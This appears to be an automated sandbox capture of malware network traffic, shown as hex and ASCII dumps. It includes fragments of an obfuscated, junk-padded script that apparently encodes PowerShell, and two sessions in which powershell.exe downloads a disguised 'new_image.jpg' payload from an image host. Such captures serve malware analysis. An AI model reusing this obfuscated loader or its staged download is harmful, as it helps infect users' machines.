        2024-05-27 13:21:04 UTC1369INData Raw: 76 61 20 26 20 72 65 70 75 6e 68 61 6e 74 65 20 26 20 72 75 69 76 61 20 26 20 22 77 44 67 54 72 65 67 44 67 54 72 65 44 30 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6e 44 67 54 72 65 44 77 44 67 54 72 65 50 44 67 54 72 65 42 43 44 67 54 72 65 45 45 44 67 54 72 65 55 77 42 46 44 67 54 72 65 44 59 44 67 54 72 65 4e 44 67 54 72 65 42 66 44 67 54 72 65 45 55 44 67 54 72 65 54 67 42 45 44 67 54 72 65 44 34 44 67 54 72 65 50 67 44 67 54 72 65 6e 44 67 54 72 65 44 73 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 48 4d 44 67 54 72 65 64 44 67 54 72 65 42 68 44 67 54 72 65 48 49 44 67 54 72 65 64 44 67 54 72 65 42 4a 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 72 75 69 76 61 20 26 20 72 65 70 75 6e 68 61 6e 74 65 20 26 20 72 75 69 76
        Data Ascii: va & repunhante & ruiva & "wDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTre" & ruiva & repunhante & ruiv
        2024-05-27 13:21:04 UTC1093INData Raw: 72 65 48 51 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 48 4d 44 67 54 72 65 64 44 67 54 72 65 42 68 44 67 54 72 65 48 49 44 67 54 72 65 64 44 67 54 72 65 42 4a 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 72 75 69 76 61 20 26 20 72 65 70 75 6e 68 61 6e 74 65 20 26 20 72 75 69 76 61 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 48 67 44 67 54 72 65 4b 51 44 67 54 72 65 67 44 67 54 72 65 48 73 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 48 4d 44 67 54 72 65 64 44 67 54 72 65 42 68 44 67 54 72 65 48 49 44 67 54 72 65 64 44 67 54 72 65 42 4a 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 72 75 69 76 61 20 26 20 72 65 70 75 6e 68 61 6e 74 65 20 26 20 72 75 69 76 61 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72
        Data Ascii: reHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTre" & ruiva & repunhante & ruiva & "DgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTre" & ruiva & repunhante & ruiva & "DgTreBlDgTr
        2024-05-27 13:21:04 UTC1369INData Raw: 31 38 34 39 0d 0a 72 65 64 44 67 54 72 65 42 79 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 6e 44 67 54 72 65 43 67 44 67 54 72 65 4a 44 67 54 72 65 42 7a 44 67 54 72 65 48 51 44 67 54 72 65 59 51 42 79 44 67 54 72 65 48 51 44 67 54 72 65 53 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 72 75 69 76 61 20 26 20 72 65 70 75 6e 68 61 6e 74 65 20 26 20 72 75 69 76 61 20 26 20 22 51 42 34 44 67 54 72 65 43 77 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 47 49 44 67 54 72 65 59 51 42 7a 44 67 54 72 65 47 55 44 67 54 72 65 4e 67 44 67 54 72 65 30 44 67 54 72 65 45 77 44 67 54 72 65 22 20 26 20 72 75 69 76 61 20 26 20 72 65 70 75 6e 68 61 6e 74 65 20 26 20 72 75 69 76 61 20 26 20 22 51 42 75 44 67 54 72 65 47 63 44 67 54 72 65 64
        Data Ascii: 1849redDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTre" & ruiva & repunhante & ruiva & "QB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTre" & ruiva & repunhante & ruiva & "QBuDgTreGcDgTred
        2024-05-27 13:21:04 UTC1369INData Raw: 49 44 67 54 72 65 44 67 54 72 65 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 47 55 44 67 54 72 65 22 20 26 20 72 75 69 76 61 20 26 20 72 65 70 75 6e 68 61 6e 74 65 20 26 20 72 75 69 76 61 20 26 20 22 44 67 54 72 65 42 42 44 67 54 72 65 48 4d 44 67 54 72 65 63 77 42 6c 44 67 54 72 65 47 30 44 67 54 72 65 59 67 42 73 44 67 54 72 65 48 6b 44 67 54 72 65 4c 67 42 48 44 67 54 72 65 47 55 44 67 54 72 65 64 44 67 54 72 65 42 55 44 67 54 72 65 48 6b 44 67 54 72 65 63 44 67 54 72 65 42 6c 44 67 54 72 65 43 67 44 67 54 72 65 4a 77 42 51 44 67 54 72 65 46 49 44 67 54 72 65 54 77 42 4b 44 67 54 72 65 45 55 44 67 54 72 65 56 44 67 54 72 65 42 50 44 67 54 72 65 45 45 44 67 54
        Data Ascii: IDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTre" & ruiva & repunhante & ruiva & "DgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgT
        2024-05-27 13:21:04 UTC1369INData Raw: 72 65 59 51 44 67 54 72 65 39 44 67 54 72 65 47 30 44 67 54 72 65 61 44 67 54 72 65 44 67 54 72 65 6d 44 67 54 72 65 47 4d 44 67 54 72 65 22 20 26 20 72 75 69 76 61 20 26 20 72 65 70 75 6e 68 61 6e 74 65 20 26 20 72 75 69 76 61 20 26 20 22 51 44 67 54 72 65 78 44 67 54 72 65 47 51 44 67 54 72 65 4d 44 67 54 72 65 44 67 54 72 65 31 44 67 54 72 65 44 59 44 67 54 72 65 4e 67 44 67 54 72 65 39 44 67 54 72 65 48 4d 44 67 54 72 65 61 51 44 67 54 72 65 6d 44 67 54 72 65 47 4d 44 67 54 72 65 4e 67 44 67 54 72 65 7a 44 67 54 72 65 44 49 44 67 54 72 65 4d 67 44 67 54 72 65 31 44 67 54 72 65 44 59 44 67 54 72 65 4e 67 44 67 54 72 65 39 44 67 54 72 65 48 67 44 67 54 72 65 22 20 26 20 72 75 69 76 61 20 26 20 72 65 70 75 6e 68 61 6e 74 65 20 26 20 72 75 69 76 61 20 26
        Data Ascii: reYQDgTre9DgTreG0DgTreaDgTreDgTremDgTreGMDgTre" & ruiva & repunhante & ruiva & "QDgTrexDgTreGQDgTreMDgTreDgTre1DgTreDYDgTreNgDgTre9DgTreHMDgTreaQDgTremDgTreGMDgTreNgDgTrezDgTreDIDgTreMgDgTre1DgTreDYDgTreNgDgTre9DgTreHgDgTre" & ruiva & repunhante & ruiva &


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        1192.168.2.649711188.114.96.3443616C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        TimestampBytes transferredDirectionData
        2024-05-27 13:21:07 UTC124OUTGET /images/004/785/720/original/new_image.jpg?1716307634 HTTP/1.1
        Host: uploaddeimagens.com.br
        Connection: Keep-Alive
        2024-05-27 13:21:07 UTC697INHTTP/1.1 200 OK
        Date: Mon, 27 May 2024 13:21:07 GMT
        Content-Type: image/jpeg
        Content-Length: 4201093
        Connection: close
        Last-Modified: Tue, 21 May 2024 16:07:14 GMT
        ETag: "664cc6b2-401a85"
        Cache-Control: max-age=2678400
        CF-Cache-Status: HIT
        Age: 3274
        Accept-Ranges: bytes
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vJClYirvGZiiU2ZUE6oq6gRWgZe5n%2FJNMbeck8%2FnyGS5lJCMb6FC3sgOd4ZAkMVlj%2FPDF0EZGs1FF3pZzNML8QOLXHmBNSg6GdfcOafmQ22uz%2BeAQpK9lJIV4fBNv5oG6ZJ28QQ3wHz6"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        Server: cloudflare
        CF-RAY: 88a64e663d590c76-EWR
        alt-svc: h3=":443"; ma=86400
        2024-05-27 13:21:07 UTC672INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
        Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
        2024-05-27 13:21:07 UTC1369INData Raw: d4 6f e1 95 2e 54 7a 99 be b9 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 c5 82 c6 49 5e 4f 1f 5e ff 00 96 05 67 d4 79 34 41 b2 d9 9a ee ce e5 9b 92 70 9b 99 a5 de dc d9 e7
        Data Ascii: o.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B*,xGU5Pay'rErv^uYt7*0ur$UxA-OF9>uI^O^gy4Ap
        2024-05-27 13:21:07 UTC1369INData Raw: 48 d9 87 25 56 1e 41 ae 79 bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3 b4 11 24 6a 08
        Data Ascii: H%VAy2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$j
        2024-05-27 13:21:07 UTC1369INData Raw: 6d c4 1f 54 e1 fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a 28 01 df 00
        Data Ascii: mTr7qLz2iO7ZsiA%nGR?{O|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a(
        2024-05-27 13:21:07 UTC1369INData Raw: f8 03 32 f9 ca c8 48 50 a3 af 73 92 1d 11 95 63 62 c2 b9 b1 9d 2e 98 46 14 06 1e af a8 c1 24 65 25 00 b0 2a 7a 9f 86 06 ae 85 92 2a 49 4d b1 4a a0 2e af 17 d5 44 04 a0 d9 00 37 e1 be b8 7d 23 23 48 18 20 6d b6 07 6c 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84 1c
        Data Ascii: 2HPscb.F$e%*z*IMJ.D7}##H ml6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW|Rm\LITUTVlD#v aT@v@b^
        2024-05-27 13:21:07 UTC1369INData Raw: 1e 1a 3c a4 52 cc a5 76 d0 0c 4f 4b 61 78 1e 78 15 7e ab 7f 0c 63 4e 88 d2 84 31 17 b1 e9 50 c5 6b ea 30 22 c0 e2 f7 77 1d 86 71 90 af 73 7f 0c 0d 43 a1 a5 e3 4c a6 bb 89 5b 8f 9f a7 2a fa 22 bb 6f 4c b4 4d 7a 64 6a fa f1 8a c1 ac 9c cf 12 99 a6 71 b8 0d aa c6 cf 3d 33 d1 ce ea fa 56 31 a2 db 10 9c 80 6f ad 8a 3d aa ef 9c 0c 73 a0 43 75 a6 5a 06 8d cc c3 fa 67 2e 89 28 56 91 48 3d 0f 9a 48 fc eb 3d 01 82 3f 3b 72 a4 61 aa ba 00 55 7d 85 0e 9f 5c 21 86 c0 b0 a4 7b 0c 0f 3c 34 4a c7 8d 3a 90 3f fb 69 e3 ff 00 0e 17 4f e0 b3 4f 32 bc 5a 55 5e 6c 39 9d 97 69 1d 0f e1 eb 79 b8 23 8d 48 a2 01 ec 08 b1 92 0c 85 c9 f3 4d 8f 73 55 80 ac fe 0b 0e b3 c4 97 59 1c ac b2 ab 2b 48 cc cb 6a 55 46 d2 ab 55 46 8d df 4f 8f 4c c7 d4 e8 9b 4f 3e a4 69 b4 10 88 a1 6d c1 e6 9b
        Data Ascii: <RvOKaxx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^l9iy#HMsUY+HjUFUFOLO>im
        2024-05-27 13:21:07 UTC1369INData Raw: 06 01 54 90 2e fa 66 7b a3 f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 cd a9 d3 2c f6
        Data Ascii: T.f{b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk},
        2024-05-27 13:21:07 UTC1369INData Raw: db 1d 13 85 1f 76 75 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa a8 e3 ae 53 53
        Data Ascii: vu#MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8rSS
        2024-05-27 13:21:07 UTC1369INData Raw: 5f 34 2f a5 6d 8c cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 83 ce 16 42
        Data Ascii: _4/mnq#O**!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};|1zwr80/`vI<R@i*$!@B
        2024-05-27 13:21:07 UTC1369INData Raw: 8b 40 74 f1 23 89 4b 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 53 a8 8e 21
        Data Ascii: @t#K2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU|JG4]Crj4825A=G=pG/|v>*M)phJeenBx}66Ov$EZX\:2A hCS!


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        2192.168.2.649713188.114.96.3443616C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        TimestampBytes transferredDirectionData
        2024-05-27 13:21:11 UTC100OUTGET /images/004/785/720/original/new_image.jpg?1716307634 HTTP/1.1
        Host: uploaddeimagens.com.br
        2024-05-27 13:21:11 UTC701INHTTP/1.1 200 OK
        Date: Mon, 27 May 2024 13:21:11 GMT
        Content-Type: image/jpeg
        Content-Length: 4201093
        Connection: close
        Last-Modified: Tue, 21 May 2024 16:07:14 GMT
        ETag: "664cc6b2-401a85"
        Cache-Control: max-age=2678400
        CF-Cache-Status: HIT
        Age: 3278
        Accept-Ranges: bytes
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BV5rdgapQPiEzK7suledxyU4qV9qfmarUKFWriyV3%2F5NjkwSmLl0EC5W25FU%2BMv2h7JgsMY%2BX6iZfEheUs%2B24A%2B5nCVFWpvWT1d020LEC5EXJtVoYcjfvF6LOeWd5TdOiuKLRJn%2FXPbD"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        Server: cloudflare
        CF-RAY: 88a64e810c7a4204-EWR
        alt-svc: h3=":443"; ma=86400
        2024-05-27 13:21:11 UTC668INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
        Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
        2024-05-27 13:21:11 UTC1369INData Raw: 02 ac c1 af d4 6f e1 95 2e 54 7a 99 be b9 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 c5 82 c6 49 5e 4f 1f 5e ff 00 96 05 67 d4 79 34 41 b2 d9 9a ee ce e5 9b 92 70 9b 99 a5
        Data Ascii: o.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B*,xGU5Pay'rErv^uYt7*0ur$UxA-OF9>uI^O^gy4Ap
        2024-05-27 13:21:11 UTC1369INData Raw: 48 f4 c5 56 48 d9 87 25 56 1e 41 ae 79 bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3 b4
        Data Ascii: HVH%VAy2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg
